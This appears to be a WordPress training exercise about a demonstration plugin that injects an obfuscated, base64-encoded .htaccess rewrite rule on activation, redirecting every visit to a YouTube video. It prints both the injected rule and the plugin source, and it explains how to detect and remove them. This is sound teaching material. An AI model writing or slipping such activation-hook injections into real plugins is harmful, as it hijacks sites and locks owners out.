Spam redirect: Hacked .htaccess

Install and activate the attached plugin.

Download Zip – ilovedc.zip

Expected Outcome Expected Outcome

When activated, you are immediately redirected to a different site. You cannot go back to your site at all. Ever.

Top ↑

How to fix How to fix

The first step is, of course, to delete this plugin. However even in doing so, you still can’t get back to your site.

Whenever this happens, it’s likely that the plugin left something on your site. Redirects that are instantaneous are usually caused by something injected into your .htaccess or index.php file. In this case, the .htaccess has the following:

# BEGIN I Love DC
<IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteBase /
        RewriteRule ^.*$ http://www.youtube.com/watch?v=oHg5SJYRHA0 [L,R=301]
</IfModule>
# END I Love DC

(If you are running WordPress out of it’s own directory, the .htaccess will be in that folder. So this site is in /home/user/domain.com/blog/ and the .htaccess would be there).

Once you delete that section from your .htaccess, the ‘hack’ goes away.

Top ↑

Understanding what happened Understanding what happened

The code of the plugin itself is very simple. There is no actually useful code in the plugin at all, and all it does is utilize insert_with_markers(), which is (legitimately) used by WP to add .htaccess rules.

class ILoveDCPlugin {
     static function install() {
		$htaccess = trailingslashit(ABSPATH).'.htaccess'; 
		$data = base64_decode('PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+CiAgICAgICAgUmV3cml0ZUVuZ2luZSBPbgogICAgICAg
IFJld3JpdGVCYXNlIC8KICAgICAgICBSZXdyaXRlUnVsZSBeLiokIGh0dHA6Ly93d3cueW91dHVi
ZS5jb20vd2F0Y2g/dj1vSGc1U0pZUkhBMCBbTCxSPTMwMV0KPC9JZk1vZHVsZT4K');
		insert_with_markers($htaccess, 'I Love DC', explode( "\n",$data));
     }
}

register_activation_hook( __FILE__, array('ILoveDCPlugin', 'install') );

By using base64_decode(), you know that things are almost always a little nefarious. You can decode the base64 string through Coderstoolbox to decrypt it, and it translates directly to the .htaccess rules we saw.

Long term, the fix is to delete the plugin and never ever use it again.